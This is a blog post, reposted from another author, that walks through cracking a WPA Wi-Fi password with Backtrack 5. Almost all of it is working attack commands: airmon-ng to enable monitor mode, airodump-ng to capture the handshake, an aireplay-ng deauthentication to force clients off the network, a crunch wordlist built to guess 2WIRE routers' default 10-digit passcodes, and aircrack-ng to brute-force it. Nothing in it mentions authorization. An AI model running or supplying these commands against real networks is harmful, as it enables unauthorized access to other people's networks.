Backtrack 5
Hey, Fajar Maulana Firdaus is back again! Okay, in this post, i will tell you how to crack a WPA using Backtrack 5. This article can be found here. Sorry for TRAiN3R, if you want this article down, please let me know. But its nice tutorial from you, and then ive decided to post it in my blog. Okay, back to the topic again. I will tell you how to crack a WPA using Backtrack 5. I just share this tutorial. Follow this steps :1. Load up Backtrack (In this case, TRAiN3R is using Backtrack 5 R2)
2. Open up "Terminal"
Type in:
airmon-ng start {WIRELESSADAPTER}
What that will do is put your device in monitor mode on "mon0" (which will now become your new interface name)3. In the "Terminal" windows, type in :
airodump-ng mon0
Now in order to get a handshake file (what we will be cracking) You need to have a client that is connected to the access point you want to attack. airodump will let you know this.4. Copy down the AP Mac, Client Mac, and of course the channel number. After you've copied that you can close the other windows.
5. In a new terminal windows type in:
airodump-ng -w {CAPFILENAME} --bssid {APMAC} -c {APCHANNEL} mon0
You can now use aireplay-ng to get the capture file, here's how we do it:aireplay-ng --deauth 1 -a {APMAC} -c {CLIENTMAC} mon0
After you do that, airodump should now say you have the handshake. That's it, you're done with getting the handshake, now its time for the long part, cracking the handshake.Your time will depend on your computer and your wordlist. In this example, TRAiN3R was attacking a 2WIREXXX network that in most cases uses a default 10 digit passcode. You can run this command to create a wordlist file for you in backtrack (for that specific wordlist)
/pentest/passwords/crunch/./crunch 10 10 0123456789 -o /pentest/passwords/wordlists/2wirewl.txt
IF YOU RUN THAT CRUNCH COMMAND, BE PREPARED ITS A 35.7GB FILE!After that, its your choice with what you want to do. You can either continue cracking it on backtrack, you can use pyrit, aircrack-ng, cowpatty, etc. You can even use windows with an application like elcomsoft wireless security auditor. For aircrack-ng run the following command:
aircrack-ng {CAPTUREFILE}-01.cap -w /pentest/passwords/wordlists/2wirewl.txt
Notes : As long as you have the capture file, you can crack it on any system. You'll want a system with alot of processing power, ram, and a supported graphics card to get upwards of 1500+ keys/second.
Take some minutes to give me any comments, critics, and suggestions. Your comments will make this blog to be more attractive [As soon as i read your comments]. Thanks for your comments! Conversion Conversion Emoticon Emoticon